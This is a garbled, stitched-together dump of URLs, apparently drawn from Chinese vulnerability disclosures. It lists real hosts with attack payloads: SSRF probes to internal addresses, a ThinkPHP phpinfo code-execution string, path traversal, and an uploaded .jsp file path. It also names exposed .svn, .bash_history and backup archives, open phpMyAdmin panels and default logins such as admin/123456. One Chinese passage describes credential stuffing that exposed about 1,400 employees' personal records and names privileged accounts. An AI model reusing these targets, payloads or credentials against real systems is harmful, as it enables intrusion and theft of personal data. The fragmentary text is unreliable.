http://esf.sz.fang.com/ http://esf.sz.fang.com/Newsecond/DelegateAndJx/Eb_HouseList.aspx?indexid=29659&houseid=0&rawid=372015 URL:http://mail.ch.com/ URL:http://mail.tourspring.com/ URL:http://mail.springtour.com/ http://**.**.**.**/page/maint/login/Page.jsp?templateId=18 http://ifi.huayiweibo.com/webroot/login.php http://118.26.207.26:8080/webroot/ http://**.**.**.**/order/orderdetail?ordercodeonline=573967 http://oa.998.com/page/element/Weather/View.jsp?ebaseid=weather&eid=5 http://shangbu.fang.com/ http://shangbu.fang.com/shangpu/5518/ http://qianhai.fang.com/ http://91baby.mama.cn/api/img/wapimg.php?img=http://192.168.10.2 http://91baby.mama.cn/api/img/wapimg.php?img=http://192.168.10.4 http://dt.locojoy.com/.svn/entries http://cn.locojoy.com/.svn/entries http://sm.locojoy.com/.svn/entries http://www.touzhu.cn:80/ www.touzhu.cn http://**.**.**.**/doc/index.php?class=邮局相关 http://**.**.**.**/doc/index.php?class=邮局相关 http://**.**.**.**/common.asp?id=1 http://dealer.xin.com/ http://www.iliangcang.com:80/ http://**.**.**.**/news/newscontent.php?id=218 http://**.**.**.**/manage/index.php https://mobileapi.zhenai.com/login/login.do a0:fe/902985/1/868017029187502/com.zhenai.android/1920/1080/a7d4360e-4383-4908-8c95-80a365f1e8c3/3 a0:fe/902985/1/868017029187502/com.zhenai.android/1920/1080/a7d4360e-4383-4908-8c95-80a365f1e8c3/3 http://my.maxthon.cn/login.html http://cme.91huayi.com/pages/news_article.aspx?KeyLink=ggl&&info_id=08244472-766c-416e-a7a4-05365dd17071 https://**.**.**.**/XDZQ/hdj_login.shtml https://github.com/lekaijun/lekj_mz/blob/974f9f6191cebdc59cf173068d32c9805a15cf61/src/main/main/com/lekj/test/util/ClientTest.java http://www.trafree.com/OTA/2011/05\ http://www.trafree.com/ http://api.bk.17173.com/api/questionDetail/more http://m.bk.17173.com/question/detail?askid=1015756&from=mobile&classid=1009568 http://114.80.124.222:9000/phpMyAdmin/ http://114.80.124.222:8000/ http://www.bjwhk.com/index.php/home/search/search.html?key=88952634&=%E6%90%9C%E7%B4%A2 http://91taoke.com/index.php?m=Help&a=lianxi&id=11 http://91taoke.com/index.php?m=Help& http://**.**.**.**/prod_item_list.php?class_id=98 http://**.**.**.**/prod_item_list.php?class_id=4 http://**.**.**.**/prod_item_list.php?class_id=1 http://**.**.**.**/prod_item_list.php?class_id=469 http://**.**.**.**/cn/prod_item_list.php?class_id=6 http://**.**.**.**/en/prod_item_list.php?class_id=28 http://**.**.**.**/china/prod_item_list.php?class_id=4 http://**.**.**.**/sp/prod_item_list.php?class_id=10 http://**.**.**.**/cn/prod_item_list.php?topage=3&class_id=4&series_id=0 http://**.**.**.**/shopping/prod_item_list.php?class_id=3 http://**.**.**.**/sp/news_detail.php?id=40 http://**.**.**.**/en/news_detail.php?id=3 http://**.**.**.**/jp/new_detail.php?id=16 http://**.**.**.**/news_detail.php?id=9&topage= http://**.**.**.**/news_detail.php?id=136&s=0&f=index http://**.**.**.**/ymca/news_detail.php?id=150 http://**.**.**.**/news_detail.php?id=3 http://**.**.**.**/news_detail.php?id=62&topage= http://**.**.**.**/forum_detail.php?forum_id=10&topage= http://**.**.**.**/forum_detail.php?forum_id=2 http://**.**.**.**/forum_detail.php?forum_id=17 http://**.**.**.**/forum_detail.php?forum_id=172&topage= http://**.**.**.**/e-shop/forum_detail.php?forum_id=2920&topage=57&dosearch=0 http://dm.cmge.com/webalizer http://**.**.**.**/coalport/coalport_2j.jsp?id=O15 http://**.**.**.**/Trade/Price/2015/price_qhd_page.jsp?place=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://**.**.**.**/Trade/Price/title/more_price.jsp?type=31 www.xin.com http://www.xin.com http://shebei.chinawutong.com/115.html?key=1 http://shebei.chinawutong.com/116.html?key=1 http://shebei.chinawutong.com/117.html?key=1 http://shebei.chinawutong.com/115.html?p=1&fn=1 http://shebei.chinawutong.com/115.html?p=1&fn=df&cn=1 http://219.223.252.215,ip反查地址是某大学研究生院,进入直接是phpmyadmin配置 https://github.com/burgesst/manage/blob/8391b2ae2afc8221294c34204c23229854697b89/Man/src/test/resources/config/common/common.properties http://**.**.**.**/ http://**.**.**.**:9098/feedback/ http://**.**.**.**:9098/feedback/feedbackLogin.do?method=logon http://**.**.**//WorkFlow/WorkFlowListAll.aspx_ http://**.**.**//WorkFlow/WorkFlowListAll.aspx_ http://**.**.**//WorkFlow/WorkFlowListAll.aspx_ http://**.**.**//WorkFlow/WorkFlowListAll.aspx_ http://**.**.**///WorkFlow/WorkFlowList_blz.aspx_ http://**.**.**//WorkFlow/WorkFlowList_blz.aspx_ http://**.**.**//WorkFlow/WorkFlowList_blz.aspx_ http://**.**.**//WorkFlow/WorkFlowList_blz.aspx_ http://**.**.**//WorkFlow/WorkFlowList_blz.aspx_ http://**.**.**//WorkFlow/WorkFlowList_blz.aspx_ http://**.**.**//WorkFlow/WorkFlowList_ybj.aspx_ http://**.**.**//WorkFlow/WorkFlowList_ybj.aspx_ http://**.**.**//WorkFlow/WorkFlowList_ybj.aspx_ http://**.**.**//WorkFlow/WorkFlowList_ybj.aspx_ http://**.**.**//WorkFlow/WorkFlowList.aspx_ http://**.**.**//WorkFlow/WorkFlowList.aspx_ http://**.**.**//WorkFlow/WorkFlowList.aspx_ http://**.**.**//WorkFlow/WorkFlowList.aspx_ http://**.**.**//WorkFlow/WorkFlowList.aspx_ http://**.**.**/Resources/ResMg/MyResSyApplyYsp.aspx_ http://**.**.**/Resources/ResMg/MyResSyApplyYsp.aspx_ http://**.**.**/Resources/ResMg/MyResSyApplyYsp.aspx_ http://**.**.**/Resources/ResMg/MyResSyApplyYsp.aspx_ http://**.**.**/Resources/ResMg/MyResSyApplyYsp.aspx_ http://**.**.**/YuSuan/Shenpi/Huankuan/HuankuanYSp.aspx_ http://**.**.**/YuSuan/Shenpi/Huankuan/HuankuanYSp.aspx_ http://**.**.**/YuSuan/Shenpi/Huankuan/HuankuanYSp.aspx_ http://**.**.**/YuSuan/Shenpi/Huankuan/HuankuanYSp.aspx_ http://**.**.**/YuSuan/Shenpi/Huankuan/HuankuanYSp.aspx_ http://**.**.**/YuSuan/Shenpi/Jiekuan/JiekuanYSp.aspx_ http://**.**.**/YuSuan/Shenpi/Jiekuan/JiekuanYSp.aspx_ http://**.**.**/YuSuan/Shenpi/Jiekuan/JiekuanYSp.aspx_ http://**.**.**/YuSuan/Shenpi/Jiekuan/JiekuanYSp.aspx_ http://**.**.**/YuSuan/Shenpi/Jiekuan/JiekuanYSp.aspx_ http://**.**.**/YuSuan/Shenpi/Baoxiao/BaoxiaoYSp.aspx_ http://**.**.**/YuSuan/Shenpi/Baoxiao/BaoxiaoYSp.aspx_ http://**.**.**/YuSuan/Shenpi/Baoxiao/BaoxiaoYSp.aspx_ http://**.**.**/YuSuan/Shenpi/Baoxiao/BaoxiaoYSp.aspx_ http://**.**.**/YuSuan/Shenpi/Baoxiao/BaoxiaoYSp.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_wt.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_wt.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_wt.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_hd.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_hd.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_hd.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_hd.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_hd.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_zl.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_zl.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_zl.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_zl.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_zl.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_yxz.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_yxz.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_yxz.aspx_ http://**.**.**//InfoManage/zhiao/MyPage_yxz.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_yxz.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_ph.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_ph.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_ph.aspx_ http://**.**.**//InfoManage/zhiao/MyPage_ph.aspx_ http://**.**.**/InfoManage/zhiao/MyPage_ph.aspx_ http://**.**.**//MyWork/wjk/Folders_show.aspxid=0_ http://**.**.**/MyWork/wjk/Folders_show.aspxid=0_ http://**.**.**/MyWork/wjk/Folders_show.aspxid=0_ http://**.**.**/MyWork/wjk/Folders_show.aspxid=0_ http://**.**.**/MyWork/wjk/Folders_show.aspxid=0_ http://**.**.**/InfoManage/zhiao/ziliao_all.aspx_ http://**.**.**/InfoManage/zhiao/ziliao_all.aspx_ http://**.**.**/InfoManage/zhiao/ziliao_all.aspx_ http://**.**.**/InfoManage/zhiao/wenti_yjj.aspx_ http://**.**.**/InfoManage/zhiao/wenti_yjj.aspx_ http://**.**.**/InfoManage/zhiao/wenti_yjj.aspx_ http://**.**.**/InfoManage/zhiao/wenti_yjj.aspx_ http://**.**.**//InfoManage/zhiao/wenti_yjj.aspx_ http://**.**.**//InfoManage/zhiao/wenti_all.aspx_ http://**.**.**/InfoManage/zhiao/wenti_all.aspx_ http://**.**.**/InfoManage/zhiao/wenti_all.aspx_ http://**.**.**/InfoManage/zhiao/wenti_all.aspx_ http://**.**.**/InfoManage/zhiao/wenti_all.aspx_ http://**.**.**/InfoManage/zhiao/wenti_wjj.aspx_ http://**.**.**//InfoManage/zhiao/wenti_wjj.aspx_ http://**.**.**//InfoManage/zhiao/wenti_wjj.aspx_ http://**.**.**/InfoManage/zhiao/wenti_wjj.aspx_ http://**.**.**/InfoManage/zhiao/wenti_wjj.aspx_ http://**.**.**/InfoManage/zhiao/wenti_xiaolei.aspxParentNodesID=1&id=0_ http://**.**.**/InfoManage/zhiao/wenti_xiaolei.aspxParentNodesID=1&id=0_ http://**.**.**/InfoManage/zhiao/wenti_xiaolei.aspxParentNodesID=1&id=0_ http://**.**.**/InfoManage/zhiao/wenti_xiaolei.aspxParentNodesID=1&id=0_ http://**.**.**/InfoManage/zhiao/ziliao_xiaolei.aspxParentNodesID=4&id=0_ http://**.**.**//InfoManage/zhiao/ziliao_xiaolei.aspxParentNodesID=4&id=0_ http://**.**.**//InfoManage/zhiao/ziliao_xiaolei.aspxParentNodesID=4&id=0_ http://**.**.**//InfoManage/zhiao/ziliao_xiaolei.aspxParentNodesID=4&id=0_ http://**.**.**/InfoManage/zhiao/wenti_xiaolei_wjj.aspxParentNodesID=1&id=0_ http://**.**.**//InfoManage/zhiao/wenti_xiaolei_wjj.aspxParentNodesID=1&id=0_ http://**.**.**//InfoManage/zhiao/wenti_xiaolei_wjj.aspxParentNodesID=1&id=0_ http://**.**.**//InfoManage/zhiao/wenti_xiaolei_wjj.aspxParentNodesID=1&id=0_ http://**.**.**/InfoManage/zhiao/wenti_xiaolei_wjj.aspxParentNodesID=1&id=0_ http://**.**.**/InfoManage/zhiao/wenti_xiaolei_yjj.aspxParentNodesID=1&id=0_ http://**.**.**/InfoManage/zhiao/wenti_xiaolei_yjj.aspxParentNodesID=1&id=0_ http://**.**.**/InfoManage/zhiao/wenti_xiaolei_yjj.aspxParentNodesID=1&id=0_ http://**.**.**/InfoManage/zhiao/ziliao_tj.aspx_ http://**.**.**//InfoManage/zhiao/ziliao_tj.aspx_ http://**.**.**/InfoManage/zhiao/ziliao_tj.aspx_ http://**.**.**/InfoManage/zhiao/ziliao_tj.aspx_ http://**.**.**/InfoManage/zhiao/ziliao_xzph.aspx http://**.**.**//InfoManage/zhiao/ziliao_xzph.aspx http://**.**.**//InfoManage/zhiao/ziliao_xzph.aspx http://**.**.**/InfoManage/zhiao/ziliao_xzph.aspx http://**.**.**/InfoManage/zhiao/ziliao_xzph.aspx http://119.145.9.199:8000 http://119.145.9.199:8000/getInfo xpa.huawei.com//bigfile/1440x3761393042821625718.jpg%2Chttp%3A//xpa.huawei.com/img/1440x3761393043296125731.jpg%2Chttp%3A//xpa.huawei.com/img/ad_21375667948093143.jpg%2Chttp%3A//xpa.huawei.com//bigfile/adver/image/banner1375784854109521.jpg xpa.huawei.com/newContentDetails.html%3Fid%3D201401200082367%23conTag%2Chttp%3A//xpa.huawei.com/XPAD.html%2C/AppDownLoadDetail.html%3Fsoftware.id%3D201307270025630 http://223.202.19.238:1900/ http://223.202.19.238:8081/iswin/ http://223.202.19.238:8081/boss-self-pc/ https://sales.pa18.com/consoler/salesconsoler_region_list.htm http://**.**.**.**/zh-cn/read.jsp?id=1,如图所示: http://221.229.252.228/login.aspx http://**.**.**.**/jsp/login.jsp http://**.**.**.**:8080/rcc/servlet/complaintsMgrServlet?flag=detail&id=1950 http://epaper.uestc.edu.cn/epaper.tar.gz http://usercenter.playcrab.com/www/index.php http://film.spider.com.cn:80/ http://**.**.**.**/ylx/default.asp http://**.**.**.** http://**.**.**.**/DBMS/AddHoldInfo.aspx?holdId=115374&parent=0 http://**.**.**.**/login.aspx http://**.**.**.**/loginForPikachu.aspx http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.**/Person/Register.aspx http://www.hkbea.com.cn/.bash_history URL:http://**.**.**.** http://**.**.**.**,可撞库,用常用用户名和弱口令123456可获得几个有效账号,登陆后可查看全局通讯录(3900多名人员姓名、部门、职务、电话等),再用通讯录中人名拼音跑,可获得七八十个有效账号,登陆账号可查看日常公文、督办工作等敏感信息,尤其是账号zhangxiaomin和liuwei权限比较高,不仅可以查看自身简历,还可以查看其他1400名人员的简历(含姓名、身份证、电话、家庭成员、教育经历、培训经历、奖惩、出国等信息)。 http://nmg.91huayi.com/news.aspx?category=3 http://**.**.**.**/Default.aspx?userid=602 http://**.**.**.**/Default.aspx?userid=574 http://**.**.**.**/Default.aspx?userid=578 http://**.**.**.**/Default.aspx?userid=602 http://**.**.**.**/Default.aspx?userid=574 http://**.**.**.**/Default.aspx?userid=578 http://**.**.**.**/Default.aspx?userid=32 http://**.**.**.**/Default.aspx?userid=580 http://**.**.**.**/Default.aspx?userid=572 http://**.**.**.**/Default.aspx?userid=600 http://**.**.**.**/Default.aspx?userid=577 http://**.**.**.**/Default.aspx?userid=570 http://**.**.**.**/Default.aspx?userid=573 http://**.**.**.**/Default.aspx?userid=531 http://**.**.**.**/Default.aspx?userid=449 http://**.**.**.**/Default.aspx?userid=368 http://**.**.**.**/Default.aspx?userid=283 http://**.**.**.**/Default.aspx?userid=535 http://**.**.**.**/Default.aspx?userid=370 http://**.**.**.**/Default.aspx?userid=369 http://**.**.**.**/Default.aspx?userid=366 http://**.**.**.**/Default.aspx?userid=272 http://**.**.**.**/Default.aspx?userid=420 http://**.**.**.**/Default.aspx?userid=371 http://**.**.**.**/Default.aspx?userid=525 http://**.**.**.**/Default.aspx?userid=501 http://**.**.**.**/Default.aspx?userid=480 http://**.**.**.**/Default.aspx?userid=520 http://**.**.**.**/Default.aspx?userid=424 http://**.**.**.**/Default.aspx?userid=252 http://**.**.**.**/Default.aspx?userid=509 http://**.**.**.**/Default.aspx?userid=232 http://**.**.**.**/Default.aspx?userid=453 http://**.**.**.**/Default.aspx?userid=483 http://**.**.**.**/Default.aspx?userid=444 http://**.**.**.**/Default.aspx?userid=514 http://**.**.**.**/Default.aspx?userid=198 http://**.**.**.**/Default.aspx?userid=423 http://**.**.**.**/Default.aspx?userid=409 http://**.**.**.**/Default.aspx?userid=315 http://**.**.**.**/Default.aspx?userid=109 http://**.**.**.**/Default.aspx?userid=123 http://**.**.**.**/Default.aspx?userid=485 http://**.**.**.**/Default.aspx?userid=403 http://**.**.**.**/Default.aspx?userid=93 http://**.**.**.**/Default.aspx?userid=417 http://**.**.**.**/Default.aspx?userid=481 http://**.**.**.**/Default.aspx?userid=512 http://**.**.**.**/Default.aspx?userid=517 http://**.**.**.**/Default.aspx?userid=431 http://**.**.**.**/Default.aspx?userid=35 http://**.**.**.**/Default.aspx?userid=452 http://**.**.**.**/Default.aspx?userid=455 http://**.**.**.**/Default.aspx?userid=205 http://**.**.**.**/Default.aspx?userid=484 http://**.**.**.**/Default.aspx?userid=170 http://**.**.**.**/Default.aspx?userid=450 http://**.**.**.**/Default.aspx?userid=447 http://**.**.**.**/Default.aspx?userid=479 http://**.**.**.**/Default.aspx?userid=51 http://**.**.**.**/Default.aspx?userid=141 http://**.**.**.**/Default.aspx?userid=500 http://**.**.**.**/Default.aspx?userid=434 http://**.**.**.**/Default.aspx?userid=422 http://**.**.**.**/Default.aspx?userid=482 http://**.**.**.**/Default.aspx?userid=524 http://**.**.**.**/Default.aspx?userid=19 http://**.**.**.**/Default.aspx?userid=374 http://**.**.**.**/Default.aspx?userid=20 http://**.**.**.**/Default.aspx?userid=416 http://**.**.**.**/Default.aspx?userid=80 http://**.**.**.**/Default.aspx?userid=24 http://**.**.**.**/Default.aspx?userid=134 http://**.**.**.**/Default.aspx?userid=199 http://**.**.**.**/Default.aspx?userid=488 http://**.**.**.**/Default.aspx?userid=426 http://**.**.**.**/Default.aspx?userid=2 http://**.**.**.**/Default.aspx?userid=559 http://**.**.**.**/Default.aspx?userid=432 http://**.**.**.**/Default.aspx?userid=355 http://**.**.**.**/Default.aspx?userid=532 http://**.**.**.**/Default.aspx?userid=33 http://**.**.**.**/Default.aspx?userid=448 http://**.**.**.**/Default.aspx?userid=511 http://**.**.**.**/Default.aspx?userid=513 http://**.**.**.**/Default.aspx?userid=231 http://**.**.**.**/Default.aspx?userid=124 http://**.**.**.**/Default.aspx?userid=601 http://**.**.**.**/Default.aspx?userid=27 http://**.**.**.**/Default.aspx?userid=30 http://**.**.**.**/Default.aspx?userid=529 http://**.**.**.**/Default.aspx?userid=39 http://**.**.**.**/Default.aspx?userid=88 http://**.**.**.**/Default.aspx?userid=155 http://**.**.**.**/Default.aspx?userid=90 http://**.**.**.**/Default.aspx?userid=478 http://**.**.**.**/Default.aspx?userid=227 http://**.**.**.**/Default.aspx?userid=34 http://**.**.**.**/Default.aspx?userid=584 http://**.**.**.**/Default.aspx?userid=659 http://**.**.**.**/Default.aspx?userid=4 http://**.**.**.**/Default.aspx?userid=178 http://**.**.**.**/Default.aspx?userid=176 http://**.**.**.**/Default.aspx?userid=598 http://**.**.**.**/Default.aspx?userid=263 http://**.**.**.**/Default.aspx?userid=590 http://**.**.**.**/Default.aspx?userid=249 http://**.**.**.**/Default.aspx?userid=589 http://**.**.**.**/Default.aspx?userid=408 http://**.**.**.**/Default.aspx?userid=518 http://**.**.**.**/Default.aspx?userid=37 http://**.**.**.**/Default.aspx?userid=580 http://**.**.**.**/Default.aspx?userid=599 http://**.**.**.**/Default.aspx?userid=594 http://**.**.**.**/Default.aspx?userid=14 http://**.**.**.**/Default.aspx?userid=593 http://**.**.**.**/Default.aspx?userid=544 http://**.**.**.**/Default.aspx?userid=591 http://**.**.**.**/Default.aspx?userid=579 http://**.**.**.**/Default.aspx?userid=564 http://**.**.**.**/Default.aspx?userid=560 http://**.**.**.**/Default.aspx?userid=221 http://**.**.**.**/Default.aspx?userid=347 http://**.**.**.**/Default.aspx?userid=581 http://**.**.**.**/Default.aspx?userid=592 http://**.**.**.**/Default.aspx?userid=557 http://**.**.**.**/Default.aspx?userid=470 http://**.**.**.**/Default.aspx?userid=541 http://**.**.**.**/Default.aspx?userid=31 http://**.**.**.**/Default.aspx?userid=182 http://**.**.**.**/Default.aspx?userid=597 http://**.**.**.**/Default.aspx?userid=558 http://**.**.**.**/Default.aspx?userid=492 http://**.**.**.**/Default.aspx?userid=603 http://**.**.**.**/Default.aspx?userid=438 http://**.**.**.**/Default.aspx?userid=583 http://**.**.**.**/Default.aspx?userid=551 http://**.**.**.**/Default.aspx?userid=507 http://**.**.**.**/Default.aspx?userid=569 http://**.**.**.**/Default.aspx?userid=588 http://**.**.**.**/Default.aspx?userid=442 http://**.**.**.**/Default.aspx?userid=441 http://**.**.**.**/Default.aspx?userid=559 http://**.**.**.**/Default.aspx?userid=451 http://**.**.**.**/Default.aspx?userid=549 http://**.**.**.**/Default.aspx?userid=546 http://**.**.**.**/Default.aspx?userid=548 http://**.**.**.**/Default.aspx?userid=598 http://**.**.**.**/Default.aspx?userid=585 http://**.**.**.**/Default.aspx?userid=555 http://**.**.**.**/Default.aspx?userid=540 http://**.**.**.**/Default.aspx?userid=554 http://**.**.**.**/Default.aspx?userid=586 http://**.**.**.**/Default.aspx?userid=563 http://**.**.**.**/Default.aspx?userid=575 http://**.**.**.**/Default.aspx?userid=567 http://**.**.**.**/Default.aspx?userid=566 http://**.**.**.**/Default.aspx?userid=565 http://**.**.**.**/Default.aspx?userid=542 http://**.**.**.**/Default.aspx?userid=561 http://**.**.**.**/Default.aspx?userid=536 http://**.**.**.**/Default.aspx?userid=553 http://**.**.**.**/Default.aspx?userid=538 http://**.**.**.**/Default.aspx?userid=439 http://**.**.**.**/Default.aspx?userid=522 http://**.**.**.**/Default.aspx?userid=84 http://**.**.**.**/Default.aspx?userid=516 http://**.**.**.**/Default.aspx?userid=543 http://**.**.**.**/Default.aspx?userid=556 http://**.**.**.**/Default.aspx?userid=193 http://**.**.**.**/Default.aspx?userid=153 http://**.**.**.**/Default.aspx?userid=562 http://**.**.**.**/Default.aspx?userid=391 http://**.**.**.**/Default.aspx?userid=496 http://**.**.**.**/Default.aspx?userid=415 http://**.**.**.**/Default.aspx?userid=527 http://**.**.**.**/Default.aspx?userid=433 http://**.**.**.**/Default.aspx?userid=497 http://**.**.**.**/Default.aspx?userid=461 http://**.**.**.**/Default.aspx?userid=23 http://**.**.**.**/Default.aspx?userid=290 http://**.**.**.**/Default.aspx?userid=20 http://**.**.**.**/Default.aspx?userid=504 http://**.**.**.**/Default.aspx?userid=325 http://**.**.**.**/Default.aspx?userid=491 http://**.**.**.**/Default.aspx?userid=427 http://**.**.**.**/Default.aspx?userid=358 http://**.**.**.**/Default.aspx?userid=7 http://**.**.**.**/Default.aspx?userid=150 http://**.**.**.**/Default.aspx?userid=47 http://**.**.**.**/Default.aspx?userid=428 http://**.**.**.**/Default.aspx?userid=180 http://**.**.**.**/Default.aspx?userid=397 http://**.**.**.**/Default.aspx?userid=258 http://**.**.**.**/Default.aspx?userid=359 http://**.**.**.**/Default.aspx?userid=411 http://**.**.**.**/Default.aspx?userid=367 http://**.**.**.**/Default.aspx?userid=309 http://**.**.**.**/Default.aspx?userid=477 http://**.**.**.**/Default.aspx?userid=487 http://**.**.**.**/Default.aspx?userid=351 http://**.**.**.**/Default.aspx?userid=298 http://**.**.**.**/Default.aspx?userid=351 http://**.**.**.**/Default.aspx?userid=550 http://**.**.**.**/Default.aspx?userid=400 http://**.**.**.**/Default.aspx?userid=445 http://**.**.**.**/download/report?file=/public/images/2014cwbb.pdf,很容易就找到漏洞的点。 http://**.**.**.**/public/images/2014cwbb.pdf可下载,所以确定是在网站根目录。 index.php/Ywfw/index07, http://**.**.**.**/download/report?file=/index.php http://**.**.**.**:8003/Login.aspx http://**.**.**.**:8002/ http://**.**.**.**:8003/Login.aspx http://**.**.**.**:8002/ http://**.**.**.**/Login.aspx http://**.**.**.**:8101/ http://**.**.**.**/ http://**.**.**.**:8666/Login.aspx http://**.**.**.**/ https://github.com/sugazaki/MZ_Delivery/blob/46a253462164ed1408d80f77453ab93d353f058b/config.js cn:3000 http://admonitor.miaozhen.com http://**.**.**.**/gobus.php?type=b&id=9 http://115.28.132.235:8088/ http://baom.jinri.cn/Product/productdetail.aspx?ProductId=1 http://api.xgo.com.cn/show_survey.php?surveyid=2 http://**.**.**.**/ http://www.dgwfund.com http://www.dgwfund.com/admin http://www.wxchina.com/index.php?s=/Product/product/gid/1*.html http://www.wxchina.com/index.php?s=/Jiejue/scheme_cp/aid/16.html http://www.wxchina.com/index.php?s=/Jiejue/scheme_cp_khjz/aid/16.html http://www.wxchina.com/index.php?s=/Server/server_info/aid/68.html http://www.wxchina.com/index.php?s=/About/a_info/aid/4.html http://**.**.**.**:8080/bmxt/ http://**.**.**.**:8080/bmxt/UserCl?metho http://**.**.**.** http://**.**.**.**:9080/home/index.action?recStaff=dldxzqkhb&storeId=13464&systemId=1 http://**.**.**.**/index.html http://**.**.**.**/type_al/0400000103.html http://**.**.**.**:80/actionDispatcher.do data:reqUrl=XDXMYQry&busiNum=XDXMY http://119.254.89.153/index.php/module/action/param1/%7B$%7Bphpinfo%28%29%7D%7D http://119.254.89.153/index.php/Public/login http://**.**.**.**/ http://link.58control.cn/AppLink.aspx?PlaceID=5&CityID=2&CateID=92241 http://unionold.58.com/linktip/link/LinkList.aspx http://unionold.58.com/main.aspx http://support.ebs.sdo.com/ http://support.ebs.sdo.com/WebResource.axd?d=3u5XW1zE2JLJAmeuBS5l_R1ULAeWcVMXdvr80XEkXjA1 http://support.ebs.sdo.com/ScriptResource.axd?d=TZHmGIqqcP_JGL7oII1K8NejJw7TGVhT0R7jo3_JDdAAAAAAAAAAAAAAAAAAAAAA0 http://**.**.**.**/wp-admin/ http://web.mysnail.cn/snailhome/ http://web.mysnail.cn/snailhome/Snail/FeedBack/index.html http://web.mysnail.cn/snailhome/Home/Index/index.html http://web.mysnail.cn/snailhome/Snail/FeedBack/index.html http://ibm.xiaozufan.com:80/ jdbc:oracle:thin:@**.**.**.**:1521:QDSC height:20px;BORDER https://vpn.ehousechina.com/por/service.csp?rnd=ponheogabjllicah http://www.you-fuli.com/ http://114.80.67.249:8080/Main.htm android:allowBackup="true http://www.sunyard.com/se_result.php,post注入,参数为“t1”。 www.sunyard.com http://www.sunyard.com http://www.sunyard.com/se_result.php http://**.**.**.**/bugs/wooyun-2015-0121230 http://**.**.**.**/login/Login.jsp?log http://**.**.**.**/tools/SWFUpload/upload.jsp http://**.**.**.**/tools/SWFUpload/upload.jsp height:20px;BORDER http://hr.jjshome.com/v/newitemworks/list?jobType=1&postId=7700177 http://106.39.118.134:8080/ http://106.39.118.134:8080/login?from=%2F http://106.39.118.134:8080/script http://106.39.118.134:8080/ http://106.39.118.134:8080/job/web3.0/ws/src/main/webapp/resources/ http://**.**.**.**/my/ajax_my_ims_init.php?ptid=44357&action=refreshcontent http://**.**.**.** http://cqwsw.91huayi.com/Page/InfoView.aspx?lm=ZCXX&id=120 http://www.longene.org/fileDownload.php?id=71 http://api.bilibili.com/x/history http://113.16.174.130:8080/manage/ybdl/logon.jsp http://113.16.174.130:8080/manage/nbyb/public/attachment.jsp?f=0.9410344776411355&action=attachmentstart&nameAttachMentIDs= http://**.**.**.**/bugs/wooyun-2010-096211 http://**.**.**.**/news_show.php?type_id=1&news_id=494 https://**.**.**.**/por/login_psw.csp http://www.changan-mazda.com.cn/market/runningmen/article.php?id=191 http://mp.sdta.cn/jqticket/webManagement/login.jsp http://58.60.191.91:88/index.asp http://58.60.191.91:88/index.asp https://www.heshidai.com/schoolCenterLoad.act?paramMap.firstNo=1 http://**.**.**/ http://coc.cccap.org.cn/auto_web/coc_para_manage/report_paraList.aspx?ent=8100 http://wixiang.com/wixiang.tar.gz http://42.121.124.225/phpmyadmin/ http://www.wabuw.com:80/public/getAdCode.php?n=rel_index_right_1存在sqlmap注入 http://wooyun.org/bugs/wooyun-2010-053474 http://status.renren.com/GetSomeomeDoingList.do?userId=244318968&curpage=1 http://www.lamall.com/activity/anniversary?lid=24 http://**.**.**.**/ http://**.**.**.**/defaultroot/extension/smartUpload.jsp?path=information&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jsp,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0 http://**.**.**.**/defaultroot/upload/information/2015092117112745434023058.jsp user:root passwd:root http://**.**.**.**/mvinfo.html?id=57 http://**.**.**.**/ http://218.22.40.178:7788/nbl_tms/ username:admin passwd:123456 http://218.22.40.178:5566/nbl_tms/ passwd:123456 http://**.**.**.**/bugs/wooyun-2015-0120232 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.** https://sslvpn.niceit.cn/por/service.csp?rnd=flhooldgffjhgbdb http://**.**.**.**/ http://cnnc.chinahr.com/forms/cnncsocial/cv_info.asp?job_list=152714000001 http://sqlmap.org http://**.**.**.**//Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**:100/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**/newssystem/xsyt.asp?type1=&id=2896 http://merchant.spider.com.cn/merchantUserlogout.html http://zhuanzhen.91huayi.com/fuwai/login/login.php http://**.**.**.**/Admin/Login.asp http://**.**.**.**/admin/DataManage.asp http://**.**.**.**/Templets/gsanb.asp http://**.**.**.**/Login.aspx http://hanzhongcme.91huayi.com/Page/InfoView.aspx?lm=Notice&id=1 Portals.Web/Portal/smgportal.aspx# http://202.120.1.117/ http://admin.giftport.com.cn/fckeditor/editor/filemanager/browser/default/connectors/test.html http://**.**.**.**/ http://**.**.**.**/console/ http://**.**.**.**/ma/ma3.jsp http://**.**.**.**/ma/out.jsp http://**.**.**.**/?k=88952634 url:http://**.**.**.**/modules/formmail/index.php?id_form=1 Id:0;609419464 Package:NTLM User:Guest Domain:WIN-OIB34EHHQ07 